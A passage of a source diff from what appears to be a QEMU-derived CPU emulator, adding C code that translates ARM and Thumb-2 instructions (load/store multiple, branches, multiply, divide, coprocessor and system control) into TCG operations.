<< 20)) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + if (user) { + tmp2 = tcg_const_i32(tcg_ctx, i); + gen_helper_set_user_reg(tcg_ctx, tcg_ctx->cpu_env, tmp2, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + } else if (i == rn) { + loaded_var = tmp; + loaded_base = 1; + } else { + store_reg_from_load(s, i, tmp); + } + } else { + /* store */ + if (i == 15) { + /* special case: r15 = PC + 8 */ + val = (long)s->pc + 4; + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, val); + } else if (user) { + tmp = tcg_temp_new_i32(tcg_ctx); + tmp2 = tcg_const_i32(tcg_ctx, i); + gen_helper_get_user_reg(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } else { + tmp = load_reg(s, i); + } + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + j++; + /* no need to add after the last transfer */ + if (j != n) + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } + } + if (insn & (1 << 21)) { + /* write back */ + if (insn & (1 << 23)) { + if (insn & (1 << 24)) { + /* pre increment */ + } else { + /* post increment */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } + } else { + if (insn & (1 << 24)) { + /* pre decrement */ + if (n != 1) + tcg_gen_addi_i32(tcg_ctx, addr, addr, -((n - 1) * 4)); + } else { + /* post decrement */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, -(n * 4)); + } + } + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + if (loaded_base) { + store_reg(s, rn, loaded_var); + } + if ((insn & (1 << 22)) && !user) { + /* Restore CPSR from SPSR. */ + tmp = load_cpu_field(s->uc, spsr); + gen_set_cpsr(s, tmp, CPSR_ERET_MASK); + tcg_temp_free_i32(tcg_ctx, tmp); + s->is_jmp = DISAS_UPDATE; + } + } + break; + case 0xa: + case 0xb: + { + int32_t offset; + + /* branch (and link) */ + val = (int32_t)s->pc; + if (insn & (1 << 24)) { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, val); + store_reg(s, 14, tmp); + } + offset = sextract32(insn << 2, 0, 26); + val += offset + 4; + gen_jmp(s, val); + } + break; + case 0xc: + case 0xd: + case 0xe: + if (((insn >> 8) & 0xe) == 10) { + /* VFP. */ + if (disas_vfp_insn(s, insn)) { + goto illegal_op; + } + } else if (disas_coproc_insn(s, insn)) { + /* Coprocessor. */ + goto illegal_op; + } + break; + case 0xf: // qq + /* swi */ + gen_set_pc_im(s, s->pc); + s->svc_imm = extract32(insn, 0, 24); + s->is_jmp = DISAS_SWI; + break; + default: + illegal_op: + gen_exception_insn(s, 4, EXCP_UDEF, syn_uncategorized()); + break; + } + } +} + +/* Return true if this is a Thumb-2 logical op. */ +static int +thumb2_logic_op(int op) +{ + return (op < 8); +} + +/* Generate code for a Thumb-2 data processing operation. If CONDS is nonzero + then set condition code flags based on the result of the operation. + If SHIFTER_OUT is nonzero then set the carry flag for logical operations + to the high bit of T1. + Returns zero if the opcode is valid. */ + +static int +gen_thumb2_data_op(DisasContext *s, int op, int conds, uint32_t shifter_out, + TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int logic_cc; + + logic_cc = 0; + switch (op) { + case 0: /* and */ + tcg_gen_and_i32(tcg_ctx, t0, t0, t1); + logic_cc = conds; + break; + case 1: /* bic */ + tcg_gen_andc_i32(tcg_ctx, t0, t0, t1); + logic_cc = conds; + break; + case 2: /* orr */ + tcg_gen_or_i32(tcg_ctx, t0, t0, t1); + logic_cc = conds; + break; + case 3: /* orn */ + tcg_gen_orc_i32(tcg_ctx, t0, t0, t1); + logic_cc = conds; + break; + case 4: /* eor */ + tcg_gen_xor_i32(tcg_ctx, t0, t0, t1); + logic_cc = conds; + break; + case 8: /* add */ + if (conds) + gen_add_CC(s, t0, t0, t1); + else + tcg_gen_add_i32(tcg_ctx, t0, t0, t1); + break; + case 10: /* adc */ + if (conds) + gen_adc_CC(s, t0, t0, t1); + else + gen_adc(s, t0, t1); + break; + case 11: /* sbc */ + if (conds) { + gen_sbc_CC(s, t0, t0, t1); + } else { + gen_sub_carry(s, t0, t0, t1); + } + break; + case 13: /* sub */ + if (conds) + gen_sub_CC(s, t0, t0, t1); + else + tcg_gen_sub_i32(tcg_ctx, t0, t0, t1); + break; + case 14: /* rsb */ + if (conds) + gen_sub_CC(s, t0, t1, t0); + else + tcg_gen_sub_i32(tcg_ctx, t0, t1, t0); + break; + default: /* 5, 6, 7, 9, 12, 15. */ + return 1; + } + if (logic_cc) { + gen_logic_CC(s, t0); + if (shifter_out) + gen_set_CF_bit31(s, t1); + } + return 0; +} + +/* Translate a 32-bit thumb instruction. Returns nonzero if the instruction + is not legal. */ +static int disas_thumb2_insn(CPUARMState *env, DisasContext *s, uint16_t insn_hw1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t insn, imm, shift, offset; + uint32_t rd, rn, rm, rs; + TCGv_i32 tmp; + TCGv_i32 tmp2; + TCGv_i32 tmp3; + TCGv_i32 addr; + TCGv_i64 tmp64; + int op; + int shiftop; + int conds; + int logic_cc; + + if (!(arm_dc_feature(s, ARM_FEATURE_THUMB2) + || arm_dc_feature(s, ARM_FEATURE_M))) { + /* Thumb-1 cores may need to treat bl and blx as a pair of + 16-bit instructions to get correct prefetch abort behavior. */ + insn = insn_hw1; + if ((insn & (1 << 12)) == 0) { + ARCH(5); + /* Second half of blx. */ + offset = ((insn & 0x7ff) << 1); + tmp = load_reg(s, 14); + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, offset); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xfffffffc); + + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, s->pc | 1); + store_reg(s, 14, tmp2); + gen_bx(s, tmp); + return 0; + } + if (insn & (1 << 11)) { + /* Second half of bl. */ + offset = ((insn & 0x7ff) << 1) | 1; + tmp = load_reg(s, 14); + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, offset); + + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, s->pc | 1); + store_reg(s, 14, tmp2); + gen_bx(s, tmp); + return 0; + } + if ((s->pc & ~TARGET_PAGE_MASK) == 0) { + /* Instruction spans a page boundary. Implement it as two + 16-bit instructions in case the second half causes an + prefetch abort. */ + offset = ((int32_t)insn << 21) >> 9; + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], s->pc + 2 + offset); + return 0; + } + /* Fall through to 32-bit decode. */ + } + + insn = arm_lduw_code(env, s->pc, s->bswap_code); + s->pc += 2; + insn |= (uint32_t)insn_hw1 << 16; + + if ((insn & 0xf800e800) != 0xf000e800) { + ARCH(6T2); + } + + rn = (insn >> 16) & 0xf; + rs = (insn >> 12) & 0xf; + rd = (insn >> 8) & 0xf; + rm = insn & 0xf; + switch ((insn >> 25) & 0xf) { + case 0: case 1: case 2: case 3: + /* 16-bit instructions. Should never happen. */ + abort(); + case 4: + if (insn & (1 << 22)) { + /* Other load/store, table branch. */ + if (insn & 0x01200000) { + /* Load/store doubleword. */ + if (rn == 15) { + addr = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, addr, s->pc & ~3); + } else { + addr = load_reg(s, rn); + } + offset = (insn & 0xff) * 4; + if ((insn & (1 << 23)) == 0) + offset = 0-offset; + if (insn & (1 << 24)) { + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); + offset = 0; + } + if (insn & (1 << 20)) { + /* ldrd */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + store_reg(s, rs, tmp); + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + store_reg(s, rd, tmp); + } else { + /* strd */ + tmp = load_reg(s, rs); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + tmp = load_reg(s, rd); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + if (insn & (1 << 21)) { + /* Base writeback. */ + if (rn == 15) + goto illegal_op; + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset - 4); + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + } else if ((insn & (1 << 23)) == 0) { + /* Load/store exclusive word. */ + addr = tcg_temp_local_new_i32(tcg_ctx); + load_reg_var(s, addr, rn); + tcg_gen_addi_i32(tcg_ctx, addr, addr, (insn & 0xff) << 2); + if (insn & (1 << 20)) { + gen_load_exclusive(s, rs, 15, addr, 2); + } else { + gen_store_exclusive(s, rd, rs, 15, addr, 2); + } + tcg_temp_free_i32(tcg_ctx, addr); + } else if ((insn & (7 << 5)) == 0) { + /* Table Branch. */ + if (rn == 15) { + addr = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, addr, s->pc); + } else { + addr = load_reg(s, rn); + } + tmp = load_reg(s, rm); + tcg_gen_add_i32(tcg_ctx, addr, addr, tmp); + if (insn & (1 << 4)) { + /* tbh */ + tcg_gen_add_i32(tcg_ctx, addr, addr, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + } else { /* tbb */ + tcg_temp_free_i32(tcg_ctx, tmp); + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + } + tcg_temp_free_i32(tcg_ctx, addr); + tcg_gen_shli_i32(tcg_ctx, tmp, tmp, 1); + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, s->pc); + store_reg(s, 15, tmp); + } else { + int op2 = (insn >> 6) & 0x3; + op = (insn >> 4) & 0x3; + switch (op2) { + case 0: + goto illegal_op; + case 1: + /* Load/store exclusive byte/halfword/doubleword */ + if (op == 2) { + goto illegal_op; + } + ARCH(7); + break; + case 2: + /* Load-acquire/store-release */ + if (op == 3) { + goto illegal_op; + } + /* Fall through */ + case 3: + /* Load-acquire/store-release exclusive */ + ARCH(8); + break; + } + addr = tcg_temp_local_new_i32(tcg_ctx); + load_reg_var(s, addr, rn); + if (!(op2 & 1)) { + if (insn & (1 << 20)) { + tmp = tcg_temp_new_i32(tcg_ctx); + switch (op) { + case 0: /* ldab */ + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + break; + case 1: /* ldah */ + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + break; + case 2: /* lda */ + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + break; + default: + abort(); + } + store_reg(s, rs, tmp); + } else { + tmp = load_reg(s, rs); + switch (op) { + case 0: /* stlb */ + gen_aa32_st8(s, tmp, addr, get_mem_index(s)); + break; + case 1: /* stlh */ + gen_aa32_st16(s, tmp, addr, get_mem_index(s)); + break; + case 2: /* stl */ + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + break; + default: + abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp); + } + } else if (insn & (1 << 20)) { + gen_load_exclusive(s, rs, rd, addr, op); + } else { + gen_store_exclusive(s, rm, rs, rd, addr, op); + } + tcg_temp_free_i32(tcg_ctx, addr); + } + } else { + /* Load/store multiple, RFE, SRS. */ + if (((insn >> 23) & 1) == ((insn >> 24) & 1)) { + /* RFE, SRS: not available in user mode or on M profile */ + if (IS_USER(s) || arm_dc_feature(s, ARM_FEATURE_M)) { + goto illegal_op; + } + if (insn & (1 << 20)) { + /* rfe */ + addr = load_reg(s, rn); + if ((insn & (1 << 24)) == 0) + tcg_gen_addi_i32(tcg_ctx, addr, addr, -8); + /* Load PC into tmp and CPSR into tmp2. */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + tmp2 = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp2, addr, get_mem_index(s)); + if (insn & (1 << 21)) { + /* Base writeback. */ + if (insn & (1 << 24)) { + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } else { + tcg_gen_addi_i32(tcg_ctx, addr, addr, -4); + } + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + gen_rfe(s, tmp, tmp2); + } else { + /* srs */ + gen_srs(s, (insn & 0x1f), (insn & (1 << 24)) ? 1 : 2, + insn & (1 << 21)); + } + } else { + int i, loaded_base = 0; + TCGv_i32 loaded_var; + /* Load/store multiple. */ + addr = load_reg(s, rn); + offset = 0; + for (i = 0; i < 16; i++) { + if (insn & (1 << i)) + offset += 4; + } + if (insn & (1 << 24)) { + tcg_gen_addi_i32(tcg_ctx, addr, addr, 0-offset); + } + + TCGV_UNUSED_I32(loaded_var); + for (i = 0; i < 16; i++) { + if ((insn & (1 << i)) == 0) + continue; + if (insn & (1 << 20)) { + /* Load. */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + if (i == 15) { + gen_bx(s, tmp); + } else if (i == rn) { + loaded_var = tmp; + loaded_base = 1; + } else { + store_reg(s, i, tmp); + } + } else { + /* Store. */ + tmp = load_reg(s, i); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } + if (loaded_base) { + store_reg(s, rn, loaded_var); + } + if (insn & (1 << 21)) { + /* Base register writeback. */ + if (insn & (1 << 24)) { + tcg_gen_addi_i32(tcg_ctx, addr, addr, 0-offset); + } + /* Fault if writeback register is in register list. */ + if (insn & (1 << rn)) + goto illegal_op; + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + } + } + break; + case 5: + + op = (insn >> 21) & 0xf; + if (op == 6) { + /* Halfword pack. */ + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + shift = ((insn >> 10) & 0x1c) | ((insn >> 6) & 0x3); + if (insn & (1 << 5)) { + /* pkhtb */ + if (shift == 0) + shift = 31; + tcg_gen_sari_i32(tcg_ctx, tmp2, tmp2, shift); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xffff0000); + tcg_gen_ext16u_i32(tcg_ctx, tmp2, tmp2); + } else { + /* pkhbt */ + if (shift) + tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, shift); + tcg_gen_ext16u_i32(tcg_ctx, tmp, tmp); + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, 0xffff0000); + } + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + } else { + /* Data processing register constant shift. */ + if (rn == 15) { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + } else { + tmp = load_reg(s, rn); + } + tmp2 = load_reg(s, rm); + + shiftop = (insn >> 4) & 3; + shift = ((insn >> 6) & 3) | ((insn >> 10) & 0x1c); + conds = (insn & (1 << 20)) != 0; + logic_cc = (conds && thumb2_logic_op(op)); + gen_arm_shift_im(s, tmp2, shiftop, shift, logic_cc); + if (gen_thumb2_data_op(s, op, conds, 0, tmp, tmp2)) + goto illegal_op; + tcg_temp_free_i32(tcg_ctx, tmp2); + if (rd != 15) { + store_reg(s, rd, tmp); + } else { + tcg_temp_free_i32(tcg_ctx, tmp); + } + } + break; + case 13: /* Misc data processing. */ + op = ((insn >> 22) & 6) | ((insn >> 7) & 1); + if (op < 4 && (insn & 0xf000) != 0xf000) + goto illegal_op; + switch (op) { + case 0: /* Register controlled shift. */ + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + if ((insn & 0x70) != 0) + goto illegal_op; + op = (insn >> 21) & 3; + logic_cc = (insn & (1 << 20)) != 0; + gen_arm_shift_reg(s, tmp, op, tmp2, logic_cc); + if (logic_cc) + gen_logic_CC(s, tmp); + store_reg_bx(s, rd, tmp); + break; + case 1: /* Sign/zero extend. */ + tmp = load_reg(s, rm); + shift = (insn >> 4) & 3; + /* ??? In many cases it's not necessary to do a + rotate, a shift is sufficient. */ + if (shift != 0) + tcg_gen_rotri_i32(tcg_ctx, tmp, tmp, shift * 8); + op = (insn >> 20) & 7; + switch (op) { + case 0: gen_sxth(tmp); break; + case 1: gen_uxth(tmp); break; + case 2: gen_sxtb16(tmp); break; + case 3: gen_uxtb16(tmp); break; + case 4: gen_sxtb(tmp); break; + case 5: gen_uxtb(tmp); break; + default: goto illegal_op; + } + if (rn != 15) { + tmp2 = load_reg(s, rn); + if ((op >> 1) == 1) { + gen_add16(s, tmp, tmp2); + } else { + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + } + store_reg(s, rd, tmp); + break; + case 2: /* SIMD add/subtract. */ + op = (insn >> 20) & 7; + shift = (insn >> 4) & 7; + if ((op & 3) == 3 || (shift & 3) == 3) + goto illegal_op; + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + gen_thumb2_parallel_addsub(s, op, shift, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + break; + case 3: /* Other data processing. */ + op = ((insn >> 17) & 0x38) | ((insn >> 4) & 7); + if (op < 4) { + /* Saturating add/subtract. */ + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + if (op & 1) + gen_helper_double_saturate(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); + if (op & 2) + gen_helper_sub_saturate(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp2, tmp); + else + gen_helper_add_saturate(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } else { + tmp = load_reg(s, rn); + switch (op) { + case 0x0a: /* rbit */ + gen_helper_rbit(tcg_ctx, tmp, tmp); + break; + case 0x08: /* rev */ + tcg_gen_bswap32_i32(tcg_ctx, tmp, tmp); + break; + case 0x09: /* rev16 */ + gen_rev16(s, tmp); + break; + case 0x0b: /* revsh */ + gen_revsh(s, tmp); + break; + case 0x10: /* sel */ + tmp2 = load_reg(s, rm); + tmp3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_i32(tcg_ctx, tmp3, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); + gen_helper_sel_flags(tcg_ctx, tmp, tmp3, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + case 0x18: /* clz */ + gen_helper_clz(tcg_ctx, tmp, tmp); + break; + case 0x20: + case 0x21: + case 0x22: + case 0x28: + case 0x29: + case 0x2a: + { + /* crc32/crc32c */ + uint32_t sz = op & 0x3; + uint32_t c = op & 0x8; + + if (!arm_dc_feature(s, ARM_FEATURE_CRC)) { + goto illegal_op; + } + + tmp2 = load_reg(s, rm); + if (sz == 0) { + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, 0xff); + } else if (sz == 1) { + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, 0xffff); + } + tmp3 = tcg_const_i32(tcg_ctx, 1 << sz); + if (c) { + gen_helper_crc32c(tcg_ctx, tmp, tmp, tmp2, tmp3); + } else { + gen_helper_crc32(tcg_ctx, tmp, tmp, tmp2, tmp3); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + break; + } + default: + goto illegal_op; + } + } + store_reg(s, rd, tmp); + break; + case 4: case 5: /* 32-bit multiply. Sum of absolute differences. */ + op = (insn >> 4) & 0xf; + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + switch ((insn >> 20) & 7) { + case 0: /* 32 x 32 -> 32 */ + tcg_gen_mul_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + if (rs != 15) { + tmp2 = load_reg(s, rs); + if (op) + tcg_gen_sub_i32(tcg_ctx, tmp, tmp2, tmp); + else + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + break; + case 1: /* 16 x 16 -> 32 */ + gen_mulxy(s, tmp, tmp2, op & 2, op & 1); + tcg_temp_free_i32(tcg_ctx, tmp2); + if (rs != 15) { + tmp2 = load_reg(s, rs); + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + break; + case 2: /* Dual multiply add. */ + case 4: /* Dual multiply subtract. */ + if (op) + gen_swap_half(s, tmp2); + gen_smul_dual(s, tmp, tmp2); + if (insn & (1 << 22)) { + /* This subtraction cannot overflow. */ + tcg_gen_sub_i32(tcg_ctx, tmp, tmp, tmp2); + } else { + /* This addition cannot overflow 32 bits; + * however it may overflow considered as a signed + * operation, in which case we must set the Q flag. + */ + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + if (rs != 15) + { + tmp2 = load_reg(s, rs); + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + break; + case 3: /* 32 * 16 -> 32msb */ + if (op) + tcg_gen_sari_i32(tcg_ctx, tmp2, tmp2, 16); + else + gen_sxth(tmp2); + tmp64 = gen_muls_i64_i32(s, tmp, tmp2); + tcg_gen_shri_i64(tcg_ctx, tmp64, tmp64, 16); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + if (rs != 15) + { + tmp2 = load_reg(s, rs); + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + break; + case 5: case 6: /* 32 * 32 -> 32msb (SMMUL, SMMLA, SMMLS) */ + tmp64 = gen_muls_i64_i32(s, tmp, tmp2); + if (rs != 15) { + tmp = load_reg(s, rs); + if (insn & (1 << 20)) { + tmp64 = gen_addq_msw(s, tmp64, tmp); + } else { + tmp64 = gen_subq_msw(s, tmp64, tmp); + } + } + if (insn & (1 << 4)) { + tcg_gen_addi_i64(tcg_ctx, tmp64, tmp64, 0x80000000u); + } + tcg_gen_shri_i64(tcg_ctx, tmp64, tmp64, 32); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + break; + case 7: /* Unsigned sum of absolute differences. */ + gen_helper_usad8(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + if (rs != 15) { + tmp2 = load_reg(s, rs); + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + break; + } + store_reg(s, rd, tmp); + break; + case 6: case 7: /* 64-bit multiply, Divide. */ + op = ((insn >> 4) & 0xf) | ((insn >> 16) & 0x70); + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + if ((op & 0x50) == 0x10) { + /* sdiv, udiv */ + if (!arm_dc_feature(s, ARM_FEATURE_THUMB_DIV)) { + goto illegal_op; + } + if (op & 0x20) + gen_helper_udiv(tcg_ctx, tmp, tmp, tmp2); + else + gen_helper_sdiv(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + } else if ((op & 0xe) == 0xc) { + /* Dual multiply accumulate long. */ + if (op & 1) + gen_swap_half(s, tmp2); + gen_smul_dual(s, tmp, tmp2); + if (op & 0x10) { + tcg_gen_sub_i32(tcg_ctx, tmp, tmp, tmp2); + } else { + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + /* BUGFIX */ + tmp64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ext_i32_i64(tcg_ctx, tmp64, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_addq(s, tmp64, rs, rd); + gen_storeq_reg(s, rs, rd, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + } else { + if (op & 0x20) { + /* Unsigned 64-bit multiply */ + tmp64 = gen_mulu_i64_i32(s, tmp, tmp2); + } else { + if (op & 8) { + /* smlalxy */ + gen_mulxy(s, tmp, tmp2, op & 2, op & 1); + tcg_temp_free_i32(tcg_ctx, tmp2); + tmp64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ext_i32_i64(tcg_ctx, tmp64, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + } else { + /* Signed 64-bit multiply */ + tmp64 = gen_muls_i64_i32(s, tmp, tmp2); + } + } + if (op & 4) { + /* umaal */ + gen_addq_lo(s, tmp64, rs); + gen_addq_lo(s, tmp64, rd); + } else if (op & 0x40) { + /* 64-bit accumulate. */ + gen_addq(s, tmp64, rs, rd); + } + gen_storeq_reg(s, rs, rd, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + } + break; + } + break; + case 6: case 7: case 14: case 15: + /* Coprocessor. */ + if (((insn >> 24) & 3) == 3) { + /* Translate into the equivalent ARM encoding. */ + insn = (insn & 0xe2ffffff) | ((insn & (1 << 28)) >> 4) | (1 << 28); + if (disas_neon_data_insn(s, insn)) { + goto illegal_op; + } + } else if (((insn >> 8) & 0xe) == 10) { + if (disas_vfp_insn(s, insn)) { + goto illegal_op; + } + } else { + if (insn & (1 << 28)) + goto illegal_op; + if (disas_coproc_insn(s, insn)) { + goto illegal_op; + } + } + break; + case 8: case 9: case 10: case 11: + if (insn & (1 << 15)) { + /* Branches, misc control. */ + if (insn & 0x5000) { + /* Unconditional branch. */ + /* signextend(hw1[10:0]) -> offset[:12]. */ + offset = ((int32_t)(insn << 5)) >> 9 & ~(int32_t)0xfff; + /* hw1[10:0] -> offset[11:1]. */ + offset |= (insn & 0x7ff) << 1; + /* (~hw2[13, 11] ^ offset[24]) -> offset[23,22] + offset[24:22] already have the same value because of the + sign extension above. */ + offset ^= ((~insn) & (1 << 13)) << 10; + offset ^= ((~insn) & (1 << 11)) << 11; + + if (insn & (1 << 14)) { + /* Branch and link. */ + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], s->pc | 1); + } + + offset += s->pc; + if (insn & (1 << 12)) { + /* b/bl */ + gen_jmp(s, offset); + } else { + /* blx */ + offset &= ~(uint32_t)2; + /* thumb2 bx, no need to check */ + gen_bx_im(s, offset); + } + } else if (((insn >> 23) & 7) == 7) { + /* Misc control */ + if (insn & (1 << 13)) + goto illegal_op; + + if (insn & (1 << 26)) { + if (!(insn & (1 << 20))) { + /* Hypervisor call (v7) */ + int imm16 = extract32(insn, 16, 4) << 12 + | extract32(insn, 0, 12); + ARCH(7); + if (IS_USER(s)) { + goto illegal_op; + } + gen_hvc(s, imm16); + } else { + /* Secure monitor call (v6+) */ + ARCH(6K); + if (IS_USER(s)) { + goto illegal_op; + } + gen_smc(s); + } + } else { + op = (insn >> 20) & 7; + switch (op) { + case 0: /* msr cpsr. */ + if (arm_dc_feature(s, ARM_FEATURE_M)) { + tmp = load_reg(s, rn); + addr = tcg_const_i32(tcg_ctx, insn & 0xff); + gen_helper_v7m_msr(tcg_ctx, tcg_ctx->cpu_env, addr, tmp); + tcg_temp_free_i32(tcg_ctx, addr); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_lookup_tb(s); + break; + } + /* fall through */ + case 1: /* msr spsr. */ + if (arm_dc_feature(s, ARM_FEATURE_M)) { + goto illegal_op; + } + tmp = load_reg(s, rn); + if (gen_set_psr(s, + msr_mask(s, (insn >> 8) & 0xf, op == 1), + op == 1, tmp)) + goto illegal_op; + break; + case 2: /* cps, nop-hint. */ + if (((insn >> 8) & 7) == 0) { + gen_nop_hint(s, insn & 0xff); + } + /* Implemented as NOP in user mode. */ + if (IS_USER(s)) + break; + offset = 0; + imm = 0; + if (insn & (1 << 10)) { + if (insn & (1 << 7)) + offset |= CPSR_A; + if (insn & (1 << 6)) + offset |= CPSR_I; + if (insn & (1 << 5)) + offset |= CPSR_F; + if (insn & (1 << 9)) + imm = CPSR_A | CPSR_I | CPSR_F; + } + if (insn & (1 << 8)) { + offset |= 0x1f; + imm |= (insn & 0x1f); + } + if (offset) { + gen_set_psr_im(s, offset, 0, imm); + } + break; + case 3: /* Special control operations. */ + ARCH(7); + op = (insn >> 4) & 0xf; + switch (op) { + case 2: /* clrex */ + gen_clrex(s); + break; + case 4: /* dsb */ + case 5: /* dmb */ + case 6: /* isb */ + /* These execute as NOPs. */ + break; + default: + goto illegal_op; + } + break; + case 4: /* bxj */ + /* Trivial implementation equivalent to bx. */ + tmp = load_reg(s, rn); + gen_bx(s, tmp); + break; + case 5: /* Exception return. */ + if (IS_USER(s)) { + goto illegal_op; + } + if (rn != 14 || rd != 